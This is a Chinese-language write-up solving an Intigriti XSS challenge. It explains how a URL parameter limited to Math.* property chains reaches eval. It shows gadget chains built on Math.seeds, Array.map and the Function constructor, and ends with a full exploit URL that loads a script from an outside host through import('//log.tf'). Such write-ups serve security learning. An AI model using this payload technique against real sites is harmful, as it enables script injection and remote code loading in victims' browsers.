来看一个有趣的XSS(二)
题解
题解payload先放文末了,铁子们可以先自行尝试一下这个挑战,下面粘出题目源码,另存为html即可
页面源码
<!DOCTYPE html>
解题思路
页面逻辑比较简单,主要思路是跟进到 URL参数 q 的限制逻辑
let qs = new URLSearchParams(window.location.search)
限制共分三个:
-
经 , 拆分出来的数组长度最长为 100
-
所有拆分出来的字符串(即数组长度要以Math.作为开头
-
所有拆分出来的字符串只能以 a-zA-Z0-9. 字符组合而成
这里我们就可以得出q的传入格式:?q=Math.xxx,Math.xxx,Math.xxx
当满足了这三个限制,最先进入 addOperator 方法:
function addOperator(name) {
这里逻辑为将我们传入的Math.xxx以嵌套的方式 塞到result.innerText中
关于 result 的定义,在之前的代码中已经明确
const result = document.querySelector('.result')
即document.querySelector('.result').innerText 中,也就是说:我们传入的q参数,最终将以下列方式进行输出
Math.xxx(Math.xxx(Math.xxx()))
但此方法只进行的传值,并未有下一步操作,故接着跟进.
接着进入 calculateResult 方法:
function calculateResult() {
这里就比较简单粗暴了,明晃晃的eval仿佛在说:在这在这!(笑
这里用到了 result.innerText,即上一个方法中传递的 Math.xxx(Math.xxx(Math.xxx()))。到这里,执行形式已经明了:
所有q传入的Math.xxx,Math.xxx,Math.xxx都将以
eval(`Math.xxx(Math.xxx(Math.xxx()))`)的格式进行执行。
这里我们就要开始解决第一个问题:如何执行我们想要的JS代码?
如果直接使用某种方法,使 Math.xxx(Math.xxx(Math.xxx()))返回字符串是肯定执行不了的。只会返回相关的 String,效果约等同于 x=1;eval("x") 得到 1
一开始我想到的是直接使用构造方法constructor.constructor("xxxx"),但只能创建出一个匿名方法,并没有可以调用的地方,但随后我注意到了页面中重写的方法Math.random
Math.random = function () {
这里可以看到使用this.seeds(this即为Math对象) 为Math中创建一个Arrayseeds
看到Array我就想到了可以通过Array.prototype.map()
等一系列的方法,以seeds中的元素为参数,对其执行map中所包裹的方法
例如当seeds为[1,2,...]时,调用seeds.map(eval),就等同于执行了:
-
eval(1)
-
eval(2)
-
eval(...)
这时我们就找到了最关键的执行环境
Math.seeds.map(Math.constructor.constructor())
这里关于Math.constructor.constructor就涉及到了构造方法相关知识Math的constructor是Object
Object的constructor是Function
所以 Math.constructor.constructor() 等同于 Function()等同于function anonymous(){}
再组合上 Array.map 可以实现可控内容执行
搞定了执行环境,接下来就是熟悉的拼接字符串的环节,如何在只用一个括号的方式进行拼接字符串呢?我最开始想到的是 String.prototype.concat()方法,即通过
/*1*/String.prototype.concat(String.prototype.toString(/*2*/String.prototype.concat(...)))
想象是美好的,例如我通过Math.exp.name得到了一个String值exp,以此作为最外层的参数。当我添加一层过后,第二次进行concat时指向的String不是最外层的concat后的值,因为concat只是拼接返回,而不是累加。同时Math.exp.name的值也是只读的,不可以修改。
虽然上述思路没有走通,但为我带来了一个新的想法:如果我有一个可控变量,并且我可以通过某种方式累加修改它,那么就有鸡喙!
一开始我是想通过某个不为人知的方法来对属性进行修改,但翻了两天MDN Web Docs除了发现Function.prototype.bind可以将某方法需要的多个参数分多次传递外,并无其他有价值的发现。走过这么多弯路后,回顾页面时我发现我要的可控变量Math.seeds不就明晃晃的在这里放着吗?!
再次回顾下Math.seeds的内容,它为Array数组,内部包含了五个Float,为:
[0.62536, 0.458483, 0.544523, 0.323421, 0.775465]
如果直接将它清空,并塞入假设能够得到的任意字符串,最后将它toString放到匿名方法中。不就可以直接搞定吗?在花了一点点时间后,得到最初的思路:
-
清空数组
Math.seeds
Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop(Math.seeds.pop())))) -
利用
Array.prototype.push,添加数字 4 与 1,因为push过后会默认返回数组的长度,且括号内步先于括号外执行,故得到Math.seeds为['4', 1]
Math.seeds.push(Math.seeds.push(Math.cbrt.name.length.toLocaleString())) -
利用
Array.prototype.join(/*空*/)将Math.seeds转换为41,之后将String.fromCharCode(41)得到的结果),push到Math.seeds中
Math.seeds.push(Math.exp.name.constructor.fromCharCode(Math.seeds.join(Math.seeds.constructor.constructor.prototype.name.toLocaleString()))) -
最后擦屁股,把
'4'与1清除掉
Math.seeds.shift(Math.seeds.shift())
这样,我们就成功得到了一个内容为[')']的Array。按照这样下去,如法炮制将import(xxxx)或eval('`'+location)塞入,但很快我又撞到了一堵墙——长度。
还记得吗?页面源码中有这么一句ops.length >= 100,也就是说:我们传递进来的值总个数不能大于100。那么在以上得到了一个括号的情况下,我们共使用了多少个呢?答案是:5+3+4+2=14
14个!就算抛开清空Math.seeds的五连pop,也要9个参数才能换取1个字符。另外执行环境的map与匿名方法也得要2个,我们最多只能塞进来(100-5-2)/9≈10共计10个字符!这还是我们在第2步投机取巧后才完成9个字符。很显然,在有长度限制的情况下,此路不通。
没办法,我又只能开始对着黑漆漆的窗口发呆。
看着sin、cos、tan按钮,我突然意识到刚刚的做法有多么愚蠢:我为什么要放着现成的可以通过Math对象可以直接得到数字的方法不用,而是傻乎乎又费劲巴力的拼接字符串的长度再换成数字?
中间省略掉对着Math对象的方法各种咔咔的传参(就是人肉fuzz),只为得到某个指定的数字例如41,最终得到:
Math.expm1(Math.sqrt(Math.seeds.constructor.length.toLocaleString.name.length.toString()))
再结合
Math.seeds.push(Math.exp.name.constructor.fromCharCode())
共计5位就得到了一个字符!也就是说,使用尽可能短的payload例如长度为17的import(/\xss.hk/) 17*5+5+2=92共计92位就可以实现!!!!也就是说这条路行得通!把payload转换为10进制
[105,109,112,111,114,116,40,47,92,120,115,115,46,104,107,47,41]
激动的心,颤抖的手,键盘库库一顿敲。中间死活得不到一百左右的准确数值时我发现:我为什么要傻乎乎的fromCharCode一个字母?我直接从别的方法name中截取不就成了?!在花了亿点点时间后,我得到了如下:
// import('//log.tf') 方法
再花一点点时间组装一下:
// 82位
拼接成URL:
https://challenge-0823.intigriti.io/challenge/index.html?q=Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.seeds.pop,Math.constructor.is.name.length.toLocaleString,Math.exp.name.constructor.prototype.trim.name.slice,Math.seeds.push,Math.constructor.is.name.length.toLocaleString,Math.seeds.constructor.prototype.pop.name.slice,Math.seeds.push,Math.exp.name.length.toLocaleString,Math.floor.name.slice,Math.seeds.push,Math.acos.name.length.toLocaleString,Math.hypot.name.slice,Math.seeds.push,Math.seeds.constructor.isPrototypeOf.name.length.toLocaleString,Math.log2,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.log,Math.expm1,Math.log,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.log.name.toLocaleString,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.log2,Math.exp,Math.log1p,Math.exp,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.acos.name.length.toLocaleString,Math.hypot.name.slice,Math.seeds.push,Math.constructor.length.toLocaleString,Math.seeds.constructor.of.name.slice,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.log,Math.expm1,Math.log,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.constructor.length.toLocaleString.name.length.toLocaleString,Math.sqrt,Math.expm1,Math.exp.name.constructor.fromCharCode,Math.seeds.push,Math.random.name.toLocaleString,Math.seeds.join,Math.constructor.constructor,Math.seeds.map
最后的最后~ 再次感谢intigriti与huli(@aszx87410)带来的题目!
另外每个月23号左右(23年为23),intigriti会联合各种大佬,再次推出新的XSS题目。如果有兴趣也可以关注一下它们再推特的推文。
